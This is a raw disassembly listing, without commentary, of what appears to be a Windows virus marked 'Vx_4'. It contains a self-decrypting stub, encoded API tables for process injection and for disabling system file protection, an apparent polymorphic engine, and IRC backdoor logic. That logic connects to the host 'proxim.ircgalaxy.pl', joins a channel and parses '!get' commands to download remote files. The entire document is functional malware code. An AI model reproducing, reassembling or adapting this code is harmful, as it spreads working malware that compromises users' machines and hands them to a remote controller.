mov edi, [ebp+arg_1042F8]
mov esi, [ebp+arg_1042F4]
loc_31432191: ; CODE XREF: start+16F�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
fmul qword ptr [ebx+edx*2]
mov ecx, 2879h
mov ebx, edx
loc_3143219D: ; CODE XREF: .gda_:314321A8�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3143219D
pop ebx
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_314321AC: ; CODE XREF: start+162�j
call near ptr loc_314321BB+2
inc ebx
insb
outsd
jnb short near ptr loc_31432218+3
dec eax
popa
outsb
db 64h
insb
loc_314321BB: ; CODE XREF: start:loc_314321AC�p
add gs:[ebx-1], dl
setalc
mov [ebp+arg_103E4A], eax
call near ptr loc_314321D7+1
inc ebx
jb short loc_31432233
popa
jz short near ptr loc_31432235+1
inc ebp
jbe short near ptr loc_31432235+4
outsb
jz short loc_31432218
loc_314321D7: ; CODE XREF: start+1C5�p
add [ebx-1], dl
setalc
mov [ebp+arg_103E4E], eax
call sub_314321F3
inc edi
db 65h
jz short near ptr loc_31432235+1
popa
jnb short near ptr loc_3143225F+2
inc ebp
jb short near ptr loc_3143225F+3
outsd
jb short $+2
; END OF FUNCTION CHUNK FOR start
; =============== S U B R O U T I N E =======================================
sub_314321F3 proc near ; CODE XREF: start+1E0�p
; FUNCTION CHUNK AT 31432599 SIZE 0000000B BYTES
push ebx
call esi ; lstrcat
mov [ebp+103E5Ah], eax
call sub_314325C4
test eax, eax
jz loc_31432165
push eax
call dword ptr [ebp+103E5Ah]
test eax, eax
jnz loc_31432599
loc_31432218: ; CODE XREF: start+1D4�j start+1B3�j
cmp byte ptr [ebp+10152Fh], 1
jnz short loc_31432235
push dword ptr [ebp+1042F8h]
dec byte ptr [ebp+10152Fh]
pop dword ptr [ebp+101588h]
loc_31432233: ; CODE XREF: start+1CB�j
jmp short loc_3143223C
; ---------------------------------------------------------------------------
loc_31432235: ; CODE XREF: sub_314321F3+2C�j
; start+1CE�j ...
and dword ptr [ebp+101588h], 0
loc_3143223C: ; CODE XREF: sub_314321F3:loc_31432233�j
and dword ptr [ebp+101578h], 0
and dword ptr [ebp+10157Ch], 0
and dword ptr [ebp+101580h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E5Eh], esi
loc_3143225F: ; CODE XREF: start+1EA�j start+1ED�j
lea esi, [ebp+1015F4h]
xor ecx, ecx
lea edi, [ebp+103E6Ah]
mov cl, 20h
call sub_31432601
pop edi
call dword ptr [ebp+103EAAh]
shr eax, 1Fh
jz loc_31432358
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E62h], eax
push 7318h
push 0
call dword ptr [ebp+103EE2h]
test eax, eax
jz loc_31432599
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CC6h
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E62h]
add esp, 20h
test eax, eax
jz loc_31432599
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E62h]
test eax, eax
jz loc_31432599
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E62h]
push 1000Ah
call dword ptr [ebp+103E62h]
call loc_31432348
jmp loc_31432599
; ---------------------------------------------------------------------------
loc_31432348: ; CODE XREF: sub_314321F3+14B�p
; sub_314321F3+162�j
push 1
pop ecx
jecxz short locret_31432357
push 0Ah
call dword ptr [ebp+103ED6h]
jmp short loc_31432348
; ---------------------------------------------------------------------------
locret_31432357: ; CODE XREF: sub_314321F3+158�j
retn
; ---------------------------------------------------------------------------
loc_31432358: ; CODE XREF: sub_314321F3+8B�j
cmp dword ptr [ebp+103E82h], 0
jz loc_31432599
call near ptr loc_3143236F+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3143236F: ; CODE XREF: sub_314321F3+172�p
add bh, bh
sub_314321F3 endp ; sp-analysis failed
xchg eax, ebp
sahf
db 3Eh
adc [eax], al
lea esi, [ebp+1017CEh]
xor ecx, ecx
lea edi, [ebp+103EEAh]
mov cl, 0Eh
xchg eax, ebx
call sub_31432601
cmp dword ptr [ebp+103F1Eh], 0
jz loc_31432599
mov eax, [ebp+103EEEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103907h]
mov eax, [ebp+103F06h]
push dword ptr [eax+1]
pop dword ptr [ebp+103954h]
mov eax, [ebp+103EF2h]
push dword ptr [eax+1]
pop dword ptr [ebp+10395Bh]
mov ecx, [ebp+103EF6h]
jecxz short loc_314323E8
push dword ptr [ecx+1]
pop dword ptr [ebp+103968h]
mov ecx, [ebp+103EFEh]
jecxz short loc_314323E8
push dword ptr [ecx+1]
pop dword ptr [ebp+103975h]
loc_314323E8: ; CODE XREF: .gda_:314323CC�j
; .gda_:314323DD�j
call sub_314325A5
lea edi, [ebp+103F74h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015DBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E20h]
loc_31432431: ; CODE XREF: .gda_:3143243A�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_31432431
mov edx, esp
push 0
push 7318h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103EFAh]
pop eax
add esp, 40h
push 7318h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7318h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F02h]
pop edi
pop ecx
test edi, edi
jz loc_31432599
lea esi, [ebp+101000h]
mov ecx, 0CC6h
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10143Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h
dd 6A206A54h, 0A95FFFFh, 8500103Fh, 34755FC0h, 14FE8h
dd 11E800h, 65530000h, 75626544h, 69725067h, 656C6976h
dd 57006567h, 550E8h, 78B5FF00h, 0FF001042h, 103E8E95h
dd 95FF5700h, 103E52h, 26A006Ah, 3E8295FFh, 28B90010h
dd 97000001h, 0C89E12Bh, 0FF575424h, 103EC695h, 83F63300h
dd 103F62A5h, 57540000h, 3ECA95FFh, 0C0850010h, 83466674h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 3EC295FFh, 0C0850010h
dd 0E893DC74h, 588h, 0E391C933h, 6285393Ah, 7500103Fh
dd 247C8132h, 72736324h, 81287473h, 0E9FC1h, 50545000h
dd 50505156h, 7A95FF53h, 8500103Eh, 0F7459C0h, 82474FFh
dd 3F62858Fh, 0C5E80010h, 53FFFFFDh, 3E5295FFh, 8EEB0010h
dd 128C481h, 0FF570000h, 103E5295h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_314321F3
loc_31432599: ; CODE XREF: sub_314321F3+1F�j
; sub_314321F3+B2�j ...
call dword ptr [ebp+103E52h]
jmp loc_31432165
; END OF FUNCTION CHUNK FOR sub_314321F3
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_314325A5 proc near ; CODE XREF: .gda_:loc_314323E8�p
; sub_314325C4+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_314325A5 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
align 4
; =============== S U B R O U T I N E =======================================
sub_314325C4 proc near ; CODE XREF: sub_314321F3+9�p
xor ecx, ecx
call sub_314325A5
lea edx, [ebp+101549h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E56h]
add esp, 20h
retn
sub_314325C4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 3 dup(58h)
dd 331800h, 0E6300h, 3 dup(0)
dd 29B000h, 0
db 0
; =============== S U B R O U T I N E =======================================
sub_31432601 proc near ; CODE XREF: sub_314321F3+7C�p
; .gda_:31432387�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E5Eh]
stosd
pop ecx
loc_3143260C: ; CODE XREF: sub_31432601+E�j
lodsb
test al, al
jnz short loc_3143260C
loop sub_31432601
retn
sub_31432601 endp
; ---------------------------------------------------------------------------
dd 1975958Dh, 0FF520010h, 103EB695h, 78858900h, 0E8001042h
dd 16h, 6B6F6F4Ch, 72507075h, 6C697669h, 56656765h, 65756C61h
dd 0FF500041h, 103E5E95h, 7C858900h, 0C3001042h, 7361425Ch
dd 6D614E65h, 624F6465h, 7463656Ah, 74565C73h, 74636553h
dd 74736C00h, 6E656C72h, 65724300h, 46657461h, 41656C69h
dd 65724300h, 46657461h, 4D656C69h, 69707061h, 41676Eh
dd 61657243h, 72506574h, 7365636Fh, 43004173h, 74616572h
dd 6D655265h, 5465746Fh, 61657268h, 72430064h, 65746165h
dd 65726854h, 43006461h, 74616572h, 6F6F5465h, 6C65686Ch
dd 53323370h, 7370616Eh, 746F68h, 74697845h, 65726854h
dd 46006461h, 54656C69h, 54656D69h, 7379536Fh, 546D6574h
dd 656D69h, 65657246h, 7262694Ch, 797261h, 46746547h, 41656C69h
dd 69727474h, 65747562h, 47004173h, 69467465h, 6953656Ch
dd 4700657Ah, 69467465h, 6954656Ch, 4700656Dh, 6F4D7465h
dd 656C7564h, 646E6148h, 41656Ch, 54746547h, 46706D65h
dd 4E656C69h, 41656D61h, 74654700h, 706D6554h, 68746150h
dd 65470041h, 72655674h, 6E6F6973h, 74654700h, 73726556h
dd 456E6F69h, 47004178h, 6F567465h, 656D756Ch, 6F666E49h
dd 74616D72h, 416E6F69h, 616F4C00h, 62694C64h, 79726172h
dd 614D0041h, 65695670h, 46664F77h, 656C69h, 6E65704Fh
dd 656C6946h, 7070614Dh, 41676E69h, 65704F00h, 6F72506Eh
dd 73736563h, 6F725000h, 73736563h, 69463233h, 747372h
dd 636F7250h, 33737365h, 78654E32h, 65530074h, 6C694674h
dd 74744165h, 75626972h, 41736574h, 74655300h, 656C6946h
dd 656D6954h, 656C5300h, 53007065h, 65747379h, 6D69546Dh
dd 466F5465h, 54656C69h, 656D69h, 616D6E55h, 65695670h
dd 46664F77h, 656C69h, 74726956h, 416C6175h, 636F6C6Ch
dd 69725700h, 69466574h, 4E00656Ch, 6A644174h, 50747375h
dd 69766972h, 6567656Ch, 6B6F5473h, 4E006E65h, 65724374h
dd 46657461h, 656C69h, 7243744Eh, 65746165h, 636F7250h
dd 737365h, 7243744Eh, 65746165h, 636F7250h, 45737365h
dd 744E0078h, 61657243h, 65536574h, 6F697463h, 744E006Eh
dd 61657243h, 73556574h, 72507265h, 7365636Fh, 744E0073h
dd 5670614Dh, 4F776569h, 63655366h, 6E6F6974h, 4F744E00h
dd 466E6570h, 656C69h, 704F744Eh, 72506E65h, 7365636Fh
dd 6B6F5473h, 4E006E65h, 65704F74h, 6365536Eh, 6E6F6974h
dd 50744E00h, 65746F72h, 69567463h, 61757472h, 6D654D6Ch
dd 79726Fh, 7551744Eh, 49797265h, 726F666Eh, 6974616Dh
dd 6F546E6Fh, 6E656Bh, 7257744Eh, 56657469h, 75747269h
dd 654D6C61h, 79726F6Dh, 6C745200h, 63696E55h, 5365646Fh
dd 6E697274h, 416F5467h, 5369736Eh, 6E697274h, 53570067h
dd 61745341h, 70757472h, 6F6C6300h, 6F736573h, 74656B63h
dd 6E6F6300h, 7463656Eh, 74656700h, 74736F68h, 616E7962h
dd 7200656Dh, 766365h, 646E6573h, 636F7300h, 74656Bh, 65746E49h
dd 74656E72h, 736F6C43h, 6E614865h, 656C64h, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 6E490065h, 6E726574h, 704F7465h, 416E65h, 65746E49h
dd 74656E72h, 6E65704Fh, 416C7255h, 746E4900h, 656E7265h
dd 61655274h, 6C694664h, 44410065h, 49504156h, 442E3233h
dd 52004C4Ch, 6C436765h, 4B65736Fh, 52007965h, 704F6765h
dd 654B6E65h, 41784579h, 67655200h, 72657551h, 6C615679h
dd 78456575h, 65520041h, 74655367h, 756C6156h, 41784565h
dd 0F6335600h, 5656026Ah, 16AD48Bh, 1872FF52h, 7C95FF56h
dd 8B001042h, 565656C4h, 70FF5650h, 0EA95FF18h, 8300103Eh
dd 0C25E10C4h, 498D0008h, 51C82BFBh, 68h, 244C8DE8h, 6A006A03h
dd 53505105h, 0CC8B056Ah, 50D48B50h, 51406A54h, 95FF5352h
dd 103F12h, 0FF0CC483h, 103F1A95h, 8C48300h, 20958DC3h
dd 3300103Eh, 52006AC9h, 32003068h, 51C48B00h, 50406A51h
dd 83186A51h, 6A5408C0h, 95FF500Eh, 103F0Eh, 3320C483h
dd 0FC085D2h, 0DAF7C299h, 0C3C22358h, 0E8FF3357h, 0FFFFFFC1h
dd 0A5840Fh, 68500000h, 7318h, 6AD48Bh, 406ACC8Bh, 10000068h
dd 52026A00h, 1868006Ah, 6A000073h, 50535100h, 3F0295FFh
dd 595F0010h, 3E5295FFh, 0FF850010h, 8D8B7174h, 101580h
dd 958D0CE3h, 101000h, 5357D103h, 858BD2FFh, 103EEEh, 29068F8Dh
dd 2BE80000h, 8BFFFFFFh, 103F0685h, 538F8D00h, 0E8000029h
dd 0FFFFFF1Ah, 3EF2858Bh, 8F8D0010h, 295Ah, 0FFFF09E8h
dd 0F6858BFFh, 8500103Eh, 8D2074C0h, 29678Fh, 0FEF4E800h
dd 858BFFFFh, 103EFEh, 0B74C085h, 29748F8Dh, 0DFE80000h
dd 8BFFFFFEh, 55C35FC7h, 0E8h, 0ED815D00h, 101B14h, 858DC933h
dd 101E9Fh, 51515451h, 0FF515150h, 103E7E95h, 24048700h
dd 3E5295FFh, 0C25D0010h, 0E8550004h, 0
dd 43ED815Dh, 6A00101Bh, 0E958DFFh, 5000101Bh, 2420CD52h
dd 83002A00h, 0C7660CC4h, 101B5485h, 0C720CD00h, 101B5685h
dd 2A002400h, 6AC35D00h, 9E8581Ah, 8D000000h, 0FEAA6142h
dd 0C3F075C9h, 3F6C9569h, 84050010h, 89420808h, 103F6C95h
dd 0C3E2F700h, 0E855h, 815D0000h, 101B9DEDh, 709D8B00h
dd 8300103Fh, 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h
dd 95FF0000h, 103EA6h, 848DFC8Bh, 10424h, 6A5000h, 4E8h
dd 52525600h, 95FF5700h, 103EA2h, 978DC933h, 104h, 26A5151h
dd 68016A51h, 40000000h, 6E95FF52h, 9600103Eh, 5B74F685h
dd 4685450h, 57000001h, 2024B4FFh, 0FF000002h, 103F4E95h
dd 0C0855900h, 14E31674h, 6AD48B50h, 57515200h, 0E695FF56h
dd 5900103Eh, 0D075C085h, 5295FF56h, 8D00103Eh, 57524457h
dd 8D58446Ah, 10497h, 0C033AB00h, 0F359106Ah, 505050ABh
dd 50505050h, 7695FF52h, 8100103Eh, 208C4h, 2474FF00h
dd 3E95FF08h, 5300103Fh, 3F3E95FFh, 0C25D0010h, 3E800004h
dd 4601750Ah, 157C8D8Bh, 19E30010h, 1000958Dh, 0D1030010h
dd 84D2FF56h, 1F880FC0h, 0F000001h, 11084h, 3A3E8000h
dd 80461075h, 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h
dd 0CF8B4275h, 4F0146C6h, 6A51CE2Bh, 53565100h, 3F3695FFh
dd 3B590010h, 0DF850FC1h, 8D000000h, 101E9385h, 68006A00h
dd 0Ch, 95FF5350h, 103F36h, 0C3Dh, 0BF850F00h, 0E9000000h
dd 0B1h, 52503E81h, 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch
dd 99h, 0F375203Ch, 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h
dd 74656721h, 3CAC7F75h, 817C7520h, 6820FF7Eh, 71757474h
dd 70037E81h, 752F2F3Ah, 0FF47C668h, 0BA310F00h, 2710h
dd 0FF52E2F7h, 103ED695h, 50C03300h, 0E8505050h, 9, 6E776F44h
dd 64616F6Ch, 4695FF00h, 8500103Fh, 333674C0h, 708589C9h
dd 5100103Fh, 20068h, 56515180h, 4A95FF50h, 8D00103Fh
dd 101B9795h, 0C9335000h, 52505154h, 95FF5151h, 103E7Eh
dd 0FF240487h, 103E5295h, 80C3F800h, 10156F8Dh, 0C3F90100h
dd 16A016Ah, 73FF33FFh, 8515FF04h, 335A74C0h, 0B3D08BDBh
dd 3C50030Bh, 1DBBB58Dh, 0BA8B0010h, 10Ch, 1088A8Bh, 0F8030000h
dd 8B60CB2Bh, 61A6F3CBh, 0E2470574h, 832EEBF5h, 8B530FC7h
dd 0D48B57CCh, 406A5450h, 0FF6A5251h, 3F1295FFh, 8D8B0010h
dd 103E86h, 2B0CC483h, 7E983CFh, 6A07C7h, 4F8900E8h, 4F53C303h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 50000002h, 0
aProxim_ircgala db 'proxim.ircgalaxy.pl',0
aNickWpthbhfaUs db 'NICK wpthbhfa',0Ah
db 'USER tJOIN &virtu',0Ah
db 'Uè',0
align 4
dd 815D0000h, 101EA5EDh, 6F85C600h, 1015h, 3EAA95FFh, 0E8C10010h
dd 6A3C741Fh, 62B58B1Eh, 5900103Eh, 752E3CACh, 3E81662Ah
dd 23751DFFh, 3F66BD8Dh, 768B0010h, 66A55702h, 0DC858DA5h
dd 8F001038h, 10390285h, 4689FA00h, 0FE4E8CFAh, 0E201B1FBh
dd 0E850EBCFh, 0FFFFFB21h, 8247C83h, 0E8447504h, 8, 2E434653h
dd 4C4C44h, 3EB695FFh, 0C00B0010h, 6A930D74h, 95FF5302h
dd 103E5Eh, 0E893D0FFh, 0FFFFFE97h, 0BE8h, 43465300h, 2E534F5Fh
dd 4C4C44h, 3EB695FFh, 7CE80010h, 0E8FFFFFEh, 0FFFFF600h
dd 12D48DFFh, 0C9330010h, 4314858Dh, 51510010h, 51505151h
dd 95FF5151h, 103EB2h, 0BE8h, 45535500h, 2E323352h, 4C4C44h
dd 3EB695FFh, 0AE80010h, 77000000h, 69727073h, 4166746Eh
dd 95FF5000h, 103E5Eh, 3E668589h, 310F0010h, 19758D8Dh
dd 85890010h, 103F6Ch, 0B695FF51h, 9300103Eh, 468h, 82B58D00h
dd 59001019h, 3F52BD8Dh, 0C2E80010h, 66FFFFF5h, 1E6585C7h
dd 50000010h, 1E67A583h, 8D000010h, 101E2595h, 6A545000h
dd 52006A01h, 268h, 5695FF80h, 8500103Fh, 22755AC0h, 1E588D8Dh
dd 6A520010h, 65B58D06h, 5400101Eh, 51505056h, 5A95FF52h
dd 5800103Fh, 3F5295FFh, 85C60010h, 104173h, 0CE800h, 53570000h
dd 334B434Fh, 4C442E32h, 95FF004Ch, 103EB6h, 76893h, 0B58D0000h
dd 1018D9h, 22BD8D59h, 0E800103Fh, 0FFFFF53Dh, 0CE8h, 4E495700h
dd 54454E49h, 4C4C442Eh, 0B695FF00h, 8500103Eh, 35840FC0h
dd 93000002h, 568h, 17B58D00h, 59001019h, 3F3EBD8Dh, 6E80010h
dd 83FFFFF5h, 103F42BDh, 840F0000h, 210h, 190EC81h, 68540000h
dd 101h, 3F2295FFh, 0C4810010h, 190h, 6AD48B50h, 95FF5200h
dd 103F42h, 7559C085h, 1388680Dh, 95FF0000h, 103ED6h, 0BD83E2EBh
dd 101E67h, 8D297500h, 101E6B85h, 95FF5000h, 103F2Eh, 840FC085h
dd 189h, 8B0C408Bh, 8F30FF00h, 101E6785h, 7385C600h, 1001041h
dd 16A006Ah, 95FF026Ah, 103F3Ah, 0FFFF883h, 16084h, 958D9300h
dd 101E63h, 5352106Ah, 3F2A95FFh, 0C0850010h, 140850Fh
dd 0BD8D0000h, 101E84h, 3CE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 103EAE95h, 92BD8D00h, 0B100101Eh, 0FA1DE801h
dd 958DFFFFh, 101E7Fh, 1468006Ah, 52000000h, 3695FF53h
dd 8D00103Fh, 8D142444h, 10431495h, 0B60F5000h, 24448B0Ah
dd 8E0C114h, 12014A02h, 4A12024Ah, 24440B03h, 0FE18008h
dd 5108E0C1h, 1024440Bh, 8D5032FFh, 103F74BDh, 1CE800h
dd 2E250000h, 2E207836h, 3A202E20h, 2E252525h, 78257838h
dd 0A732520h, 4E494F4Ah, 0FF570020h, 103E6695h, 0ACC48100h
dd 6A000000h, 53575000h, 3F3695FFh, 8D8B0010h, 101588h
dd 1BE3006Ah, 510DC96Bh, 5E8h, 64252600h, 0FF57000Ah, 103E6695h
dd 0CC48300h, 680BEB50h, 7, 1E98BD8Dh, 53570010h, 3F3695FFh
dd 0C0850010h, 0B58D547Eh, 103F74h, 1588A583h, 8D000010h
dd 1041738Dh, 6ACE2B00h, 53565100h, 3F3295FFh, 0F8830010h
dd 912F7E00h, 0B58DFE8Bh, 103F74h, 0AEF20DB0h, 0E8601075h
dd 0FFFFFA2Ah, 0E3177261h, 1778D09h, 0CF8BEAEBh, 0BD8DCE2Bh
dd 103F74h, 0F787A4F3h, 0FF53B9EBh, 103F2695h, 6FBD8000h
dd 1001015h, 30682A74h, 0FF000075h, 103ED695h, 73BD8000h
dd 1041h, 85C71174h, 101E67h, 0
dd 417385C6h, 0E9000010h, 0FFFFFE08h, 157885C7h, 10h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 11AB7121h, 0A614294Eh
dd 0E1519410h, 4000FE86h, 0E50F70BDh, 0D18318h, 1F7DBEB3h
dd 6CCC5CC9h, 0B6CC77C2h, 0B8B352CFh, 0D8h, 15h dup(0)
dd 0A5836000h, 1042E4h, 0E8A58300h, 1042h, 1443B70Fh, 0F18538Dh
dd 3064BB7h, 24448BD0h, 0C422B24h, 423B1972h, 8B147308h
dd 422B1442h, 0E495890Ch, 89001042h, 1042E885h, 8305EB00h
dd 0D9E228C2h, 4C261h, 24578588h, 64E80010h, 68000000h
dd 20h, 2384858Dh, 39590010h, 830C7418h, 0F7E204C0h, 42C085FFh
dd 0F7C30010h, 578D03D9h, 0E3001024h, 0FC70FF10h, 0E883008Fh
dd 89F6E204h, 1023849Dh, 3A8300h, 322B0574h, 8D107203h
dd 5B58FC4Eh, 3A835Eh, 32FF0474h, 72FF03EBh, 0FF57E810h
dd 0CE2BFFFFh, 42E88D2Bh, 3580010h, 8FC3344Bh, 1042C485h
dd 0C085C700h, 1042h, 0E8000000h, 3Ch, 42C0858Bh, 0A9E80010h
dd 0E8FFFFF6h, 18h, 42C0BD83h, 75000010h, 9D8908h, 0EB001024h
dd 0C08DFF9Ch, 0C3001042h, 42C4858Fh, 95890010h, 1042C0h
dd 3E8h, 0C3C93300h, 80938Bh, 0E8520000h, 0FFFFFEEDh, 42E89503h
dd 0D6030010h, 0C7A83h, 107840Fh, 7A830000h, 840F0010h
dd 0FDh, 500C428Bh, 0FFFEC8E8h, 0E88503FFh, 3001042h, 88A50C6h
dd 7400F980h, 2EF98019h, 0EB400374h, 1488BF1h, 0DFDFE181h
dd 0F981DFDFh, 4C4C44h, 2B59EC75h, 0FAF983C8h, 0B78F0Fh
dd 81660000h, 3233FE78h, 0AB850Fh, 83560000h, 575003Ah
dd 0EB104A8Bh, 30A8B02h, 72E851F1h, 3FFFFFEh, 1042E8B5h
dd 0C085AD00h, 840FFB78h, 84h, 42E8B5FFh, 0E8500010h, 0FFFFFE55h
dd 42E88503h, 858F0010h, 1042E8h, 53240403h, 3302C083h
dd 8B60FDBh, 0C98012E3h, 24C15320h, 1C290424h, 240C2924h
dd 0E9EB405Bh, 0D70FFB81h, 3E74DDBBh, 45A8FB81h, 3674DB6Eh
dd 3B59FB81h, 2E74FFA1h, 22D6FB81h, 2674ACB5h, 0E993FB81h
dd 1E74F358h, 0E97DFB81h, 1674F358h, 3F46FB81h, 0E74E125h
dd 3F30FB81h, 674E125h, 42C495FFh, 0E95B0010h, 0FFFFFF71h
dd 14C2835Eh, 0FFFEEFE9h, 6A03C3FFh, 49E85804h, 88FFFFF5h
dd 10263195h, 31B86600h, 0C0E20218h, 0E20203E4h, 66AAB66h
dd 0F52EE858h, 0C283FFFFh, 6AD18708h, 21E85805h, 80FFFFF5h
dd 0B7303FAh, 850250B0h, 102631h, 6A27EBAAh, 80AA5868h
dd 187503FAh, 1E811B0h, 0B8FFFFF5h, 1, 0D74D284h, 0CAFEE0D1h
dd 5EBF6EBh, 0B8h, 0BFE2AB80h, 0BC958DC3h, 2B001039h, 0C3DAF7D7h
dd 39B085F7h, 10h, 950F1000h, 0BE0C1C0h, 39AE85F6h, 75010010h
dd 890D6606h, 0F613EB25h, 1039AE85h, 6750200h, 25310D66h
dd 0D6604EBh, 0AB662501h, 0FFFFBCE8h, 34438BFFh, 42D89589h
dd 0C3AB0010h, 39B085F7h, 10h, 950F1000h, 0AABC04C0h, 0FFFF9CE8h
dd 0DC9589FFh, 0F6001042h, 1039AE85h, 4750100h, 2EB310Fh
dd 0C3ABC02Bh, 39B085F7h, 10h, 27741000h, 39AA858Ah, 0E0C10010h
dd 8B0D660Bh, 0B0AB6645h, 858AAAF8h, 1039AAh, 51BE0C1h
dd 6896467h, 66C033ABh, 0B812EBABh, 58F64h, 0AA858AABh
dd 4001039h, 18E0C158h, 85C6C3ABh, 10278Ch, 0B025EB09h
dd 6620EBFCh, 6600EBB8h, 6A19EBABh, 9E85804h, 8DFFFFF4h
dd 0E0C1D204h, 89056608h, 0EBAB66C0h, 0AA90B003h, 0E858216Ah
dd 0FFFFF3F0h, 278C8580h, 80060010h, 2F7308FAh, 0C374D284h
dd 0C374CAFEh, 0C774CAFEh, 0D974CAFEh, 0C74CAFEh, 2 dup(0F74CAFEh)
dd 0CBEBF9B0h, 0B0AA87B0h, 0B0C4EBDBh, 0B0C0EBF5h, 0C3BCEBF8h
dd 39B085F7h, 20000010h, 86B00000h, 4040275h, 8AFE4F8Dh
dd 1039A8A5h, 80AB6600h, 77505FCh, 4F8000B0h, 0E8AA40FFh
dd 0FFFFFF62h, 39B085F7h, 40000010h, 0B8660000h, 2753166h
dd 0AB6629B4h, 850A18B0h, 1039AAh, 0AA03E0C0h, 0FFFF3DE8h
dd 0F788B0FFh, 1039B085h, 800000h, 0B0027500h, 0A8A58A86h
dd 66001039h, 5FC80ABh, 0B00775h, 40FF4F80h, 0BD8DC3AAh
dd 1039BCh, 0FFFF0DE8h, 0B085F7FFh, 1039h, 74004000h, 0AA60B003h
dd 39B085F7h, 10h, 7741000h
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-4F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dw 0
dd 0F0840F02h, 0B0000000h, 89ABAAE8h, 1042C8BDh, 0FECCE800h
dd 0E8B0FFFFh, 0BD89ABAAh, 1042CCh, 0FFFEBDE8h, 0B085F7FFh
dd 3001039h, 74000000h, 0B085F71Ah, 1039h, 74020000h, 0FE2EE80Ah
dd 9BE8FFFFh, 0B0FFFFFEh, 8BABAAE9h, 1042C885h, 2BCF8B00h
dd 0D0BD89C8h, 89001042h, 67B8FC48h, 0AB36FF64h, 0AB66C033h
dd 39B085F7h, 30010h, 13740000h, 39AE85F6h, 74800010h
dd 0FDAAE80Ah, 5BE8FFFFh, 0B8FFFFFEh, 26896467h, 66C033ABh
dd 0B085F7ABh, 3001039h, 74000000h, 0AE85F65Ah, 80001039h
dd 81E80A75h, 0E8FFFFFDh, 0FFFFFE32h, 0FFFD02E8h, 0E820B0FFh
dd 0FFFFFB14h, 0B86639E3h, 0AB6615FFh, 958BAB91h, 1039B0h
dd 0C2F7D2F7h, 3, 0DCE81475h, 0B0FFFFFCh, 0FAEEE81Fh, 0B866FFFFh
dd 0AB6615FFh, 0CF8BAB91h, 42D0858Bh, 0C82B0010h, 0F7FC4889h
dd 1039B085h, 300h, 0F7387400h, 1039B085h, 0
dd 0F72C740Ch, 1039B085h, 0
dd 0E80A7502h, 0FFFFFDC2h, 0FFFD4BE8h, 0B085F7FFh, 1039h
dd 74080000h, 0FDACE80Ah, 61E8FFFFh, 0F7FFFFFDh, 1039B085h
dd 400h, 0E8177400h, 0FFFFFD96h, 0FEC029B8h, 8B8ABC8h
